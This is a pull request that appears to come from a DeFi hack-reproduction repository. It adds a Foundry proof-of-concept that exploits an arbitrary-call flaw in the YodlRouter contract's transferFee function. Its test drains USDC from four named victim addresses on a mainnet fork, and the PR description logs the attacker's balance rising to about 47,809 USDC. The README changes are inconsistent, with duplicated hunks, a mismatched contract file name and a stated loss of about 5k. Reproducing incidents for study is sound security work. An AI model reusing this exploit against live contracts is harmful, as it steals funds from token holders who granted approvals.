### PR TITLE
feat: add yodl router attack

### DIFF
--- a/README.md
+++ b/README.md
@@ -1123,9 +1123,6 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 
 ### List of DeFi Hacks & POCs
 
-
-
-
 ### 20240814 NoName - Arbitrary Call
 
 ### Lost: ~5k

--- a/README.md
+++ b/README.md
@@ -48,6 +48,7 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 - [Giveth](https://giveth.io/donate/defihacklabs)
 
 ## List of Past DeFi Incidents
+
 [20240814 YodlRouter](#20240814-noname---arbitrary-call)
 
 [20240812 iVest](#20240812-iVest---business-logic-flaw)

--- a/README.md
+++ b/README.md
@@ -48,6 +48,7 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 - [Giveth](https://giveth.io/donate/defihacklabs)
 
 ## List of Past DeFi Incidents
+[20240814 YodlRouter](#20240814-noname---arbitrary-call)
 
 [20240812 iVest](#20240812-iVest---business-logic-flaw)
 
@@ -1120,6 +1121,25 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 ---
 
 ### List of DeFi Hacks & POCs
+
+
+
+
+### 20240814 NoName - Arbitrary Call
+
+### Lost: ~5k
+
+
+```sh
+forge test --contracts ./src/test/2024-08/YodlRouter_exp.sol -vvv
+```
+#### Contract
+[NoName_exp.sol](src/test/2024-08/NoName_exp.sol)
+### Link reference
+
+https://x.com/0xNickLFranklin/status/1823601087011807636
+
+---
 
 ### 20240812 iVest - Business logic flaw
 

--- a/README.md
+++ b/README.md
@@ -2,7 +2,7 @@
 
 **Reproduce DeFi hack incidents using Foundry.**
 
-518 incidents included.
+519 incidents included.
 
 Let's make Web3 secure! Join [Discord](https://discord.gg/Fjyngakf3h)
 

--- a/src/test/2024-08/YodlRouter_exp.sol
+++ b/src/test/2024-08/YodlRouter_exp.sol
@@ -1,0 +1,65 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.15;
+
+import "../basetest.sol";
+import "../interface.sol";
+
+// @KeyInfo - Total Lost : ~5k
+// Attacker : https://etherscan.io/address/0xedee6379fe90bd9b85d8d0b767d4a6deb0dc9dcf
+// Attack Contract : https://etherscan.io/address/0x802cfff8d7cb27879e00496843bb69361ff09ab3
+// Vulnerable Contract : https://etherscan.io/address/0xe3a0bc3483ae5a04db7ef2954315133a6f7d228e
+// Attack Tx : https://etherscan.io/tx/0x54f659773dae6e01f83184d4b6d717c7f1bb71c0aa59e8c8f4a57c25271424b3
+
+// @Info
+// Vulnerable Contract Code : https://etherscan.io/address/0xe3a0bc3483ae5a04db7ef2954315133a6f7d228e#code
+
+// @Analysis
+// Post-mortem : 
+// Twitter Guy : 
+// Hacking God : 
+pragma solidity ^0.8.0;
+
+interface IR {
+    function transferFee(uint256 amount, uint256 feeBps, address token, address from, address to) external;
+}
+
+contract NoName is BaseTestWithBalanceLog {
+    uint256 blocknumToForkFrom = 20_520_368;
+    address internal YodlRouter = 0xE3A0bc3483AE5a04DB7eF2954315133a6F7D228E;
+    address internal USDC = 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48;
+
+    function setUp() public {
+        vm.createSelectFork("mainnet", blocknumToForkFrom);
+        //Change this to the target token to get token balance of,Keep it address 0 if its ETH that is gotten at the end of the exploit
+        fundingToken = address(USDC);
+    }
+
+    function testExploit() public balanceLog {
+        //implement exploit code here
+        uint256 amount;
+        uint256 feeBps = 10_000;
+        address token = USDC;
+        address from;
+        address to = address(this);
+
+        // Victim 0
+        from = 0x5322BFF39339eDa261Bf878Fa7d92791Cc969Bb0;
+        amount = 45_588_747_326;
+        IR(YodlRouter).transferFee(amount, feeBps, token, from, to);
+
+        // Victim 1
+        from = 0xa7b7d4ebF1F5035F3b289139baDa62f981f2916E;
+        amount = 1_219_608_225;
+        IR(YodlRouter).transferFee(amount, feeBps, token, from, to);
+
+        // Victim 2
+        from = 0x2c349022df145C1a2eD895B5577905e6F1Bc7881;
+        amount = 1_000_000_000;
+        IR(YodlRouter).transferFee(amount, feeBps, token, from, to);
+
+        // Victim 3
+        from = 0x96D0F726FD900E199680277aAaD326fbdebc6BF9;
+        amount = 1_000_000;
+        IR(YodlRouter).transferFee(amount, feeBps, token, from, to);
+    }
+}


### PR DESCRIPTION
```
Ran 1 test for src/test/2024-08/YodlRouter_exp.sol:NoName
[PASS] testExploit() (gas: 135483)
Logs:
  Attacker USDC Balance Before exploit: 0.000000
  Attacker USDC Balance After exploit: 47809.355551

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 800.18ms (1.64ms CPU time)
```